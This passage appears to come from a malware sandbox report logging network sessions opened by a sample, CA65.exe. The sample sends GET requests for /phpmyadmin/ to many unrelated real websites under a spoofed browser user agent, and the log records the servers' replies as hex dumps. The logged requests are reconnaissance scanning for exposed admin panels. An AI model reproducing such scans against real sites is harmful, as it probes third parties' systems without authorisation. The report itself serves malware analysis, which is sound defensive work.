2023-12-22 20:14:51 UTC	835	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPqTqhyXUjvKf4usjQYdUvJJUHfMYsO7KZDJWHmKJWTJSRmpezAoi9QeREeO6vINJzjmXVVrc7nQug date: Fri, 22 Dec 2023 20:14:51 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:14:51 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:14:51 UTC	2883	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"
2023-12-22 20:14:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	54972	185.162.89.66	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	496	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:14:51 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:14:51 UTC	872	IN	Data Raw: 34 33 61 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 3c 2f Data Ascii: 43ad<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – Oceanic Trailers</
2023-12-22 20:14:52 UTC	14994	IN	Data Raw: 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 Data Ascii: s\/js\/wp-emoji-release.min.js?ver=6.4.2"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.cle
2023-12-22 20:14:52 UTC	1467	IN	Data Raw: 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 Data Ascii: sh-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !importa
2023-12-22 20:14:52 UTC	8372	IN	Data Raw: 32 30 61 63 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 67 6f 6f 67 6c 65 2d 66 6f 6e 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 66 6f 6e 74 73 2f 30 30 66 34 39 34 66 34 62 37 32 31 36 66 31 61 65 31 37 61 33 36 36 62 62 64 65 38 62 66 38 34 2e 63 73 73 3f 76 65 72 3d 31 2e 30 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6f 63 65 61 6e 69 63 74 72 61 69 6c 65 72 73 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e Data Ascii: 20ac<link rel='stylesheet' id='google-font-css' href='https://oceanictrailers.com.au/wp-content/fonts/00f494f4b7216f1ae17a366bbde8bf84.css?ver=1.0.1' media='all' /><link rel='stylesheet' id='font-awesome-css' href='https://oceanictrailers.com.au/wp-con
2023-12-22 20:14:52 UTC	6872	IN	Data Raw: 31 61 63 62 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 6f 73 65 5f 6e 61 76 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 69 6d 65 73 22 3e 3c 2f 69 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 3c 21 2d 2d 20 23 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 65 72 3e 3c 21 2d 2d 20 23 Data Ascii: 1acb <button class="close_nav"><i class="fa fa-times"></i></button> </ul> </nav>... #site-navigation --> </div> </section> </div> </header>... #

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	54945	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	985	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K45d3QTzkzxG6Sa5udBENVU6VAbOiK9fW74tVpJISQukID1%2FF6KuI7iJX2k3EdKcPRXVYVmu%2BKGM9JqnV006sYmNo2Zl8%2B%2BkzZrYOxZsEGP%2B4EjSe%2Bn%2BkUWjzCZHTXQsRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b0892da64d9bd-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	54937	199.59.243.225	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: customintegrated.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	689	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1049 X-Request-Id: b6ff8669-20b2-43d1-a838-59a91f7ea951 Cache-Control: no-store, max-age=0 Accept-Ch: sec-ch-prefers-color-scheme Critical-Ch: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Gg1LvJVLap4VZlTdXGwH4zdtbRuxg1Z848Q6oZ/xoBdwn5wuAuCo8GV/sul52lvMY9phXlojAdfPPbKxxJhkqw== Set-Cookie: parking_session=b6ff8669-20b2-43d1-a838-59a91f7ea951; expires=Fri, 22 Dec 2023 20:29:51 GMT; path=/ Connection: close
2023-12-22 20:14:51 UTC	497	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 67 31 4c 76 4a 56 4c 61 70 34 56 5a 6c 54 64 58 47 77 48 34 7a 64 74 62 52 75 78 67 31 5a 38 34 38 51 36 6f 5a 2f 78 6f 42 64 77 6e 35 77 75 41 75 43 6f 38 47 56 2f 73 75 6c 35 32 6c 76 4d 59 39 70 68 58 6c 6f 6a 41 64 66 50 50 62 4b 78 78 4a 68 6b 71 77 3d Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Gg1LvJVLap4VZlTdXGwH4zdtbRuxg1Z848Q6oZ/xoBdwn5wuAuCo8GV/sul52lvMY9phXlojAdfPPbKxxJhkqw=
2023-12-22 20:14:51 UTC	552	IN	Data Raw: 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 59 6a 5a 6d 5a 6a 67 32 4e 6a 6b 74 4d 6a 42 69 4d 69 30 30 4d 32 51 78 4c 57 45 34 4d 7a 67 74 4e 54 6c 68 4f 54 46 6d 4e 32 56 68 4f 54 55 78 49 69 77 69 63 47 46 6e 5a 56 39 30 61 57 31 6c 49 6a 6f 78 4e Data Ascii: zFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjZmZjg2NjktMjBiMi00M2QxLWE4MzgtNTlhOTFmN2VhOTUxIiwicGFnZV90aW1lIjoxN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	54377	185.230.63.171	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	838	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Length: 0 Connection: close location: https://www.valentinegrowers.com/phpmyadmin strict-transport-security: max-age=3600 x-wix-request-id: 1703276091.358171263245316001 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLk1Uxi5aVwrmRyfWZ8T7SgAMbwluI1yUDJty9McxOlfY,2d58ifebGbosy5xc+FRallLCD2UesEqzz9DOBIdsAGtL5ZZB5XnJC7Wg6awwhVKfd2jHG7xtYyKqtt3g3xRN8Q==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,DEnfYUXdSlAXRA94e/x0z9PemxzKRf9YsHX50AJRTUM=,WDMzHiyOL7uW518fW2ByrzK4uecrAoLjthJtqM/WcVpTU9y8YawPmYqGpapuMtBNBCnxTH98zwTLyGB2+G5M+w== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	54974	35.168.67.138	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: mcammond.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	251	IN	HTTP/1.1 307 Temporary Redirect Date: Fri, 22 Dec 2023 20:14:51 GMT Connection: close Server: ATS Cache-Control: no-store Content-Type: text/html Content-Language: en Location: http://sites.google.com/site/mcammondlife/ Content-Length: 207
2023-12-22 20:14:51 UTC	207	IN	Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 77 68 69 74 65 22 20 46 47 43 4f 4c 4f 52 3d 22 62 6c 61 63 6b 22 3e 0a 3c 48 31 3e 45 72 72 6f 72 3c 2f 48 31 3e 0a 3c 48 52 3e 0a 0a 3c 46 4f 4e 54 20 46 41 43 45 3d 22 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 22 3e 3c 42 3e 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 3e 3c 2f 46 4f 4e 54 3e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY BGCOLOR="white" FGCOLOR="black"><H1>Error</H1><HR><FONT FACE="Helvetica,Arial"><B>Description: Could not process this request.</B></FONT><HR></BODY>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	55006	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	466	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:14:50 GMT Server: Kestrel Set-Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831;Path=/;HttpOnly;Secure;Domain=intermountainmls.com Set-Cookie: ARRAffinitySameSite=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831;Path=/;HttpOnly;SameSite=None;Secure;Domain=intermountainmls.com X-Powered-By: ASP.NET
2023-12-22 20:14:51 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	53892	69.42.204.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:51 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	55030	192.252.151.25	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: oljud.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:51 UTC	274	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Last-Modified: Mon, 06 Jun 2005 08:43:43 GMT ETag: "31a-3f8dbb37d6dc0;45d2231770ec0 Accept-Ranges: bytes Content-Length: 794 Content-Type: text/html
2023-12-22 20:14:51 UTC	794	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 2e 73 74 79 6c 65 33 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 43 43 30 30 30 30 3b 0a 7d 0a 2e 73 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>404 Not Found</title><style type="text/css">....style3 { font-family: Verdana, Arial, Helvetica, sans-serif; color: #CC0000;}.s { font-family: Verdana

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	54468	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:51 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:53 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:53 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 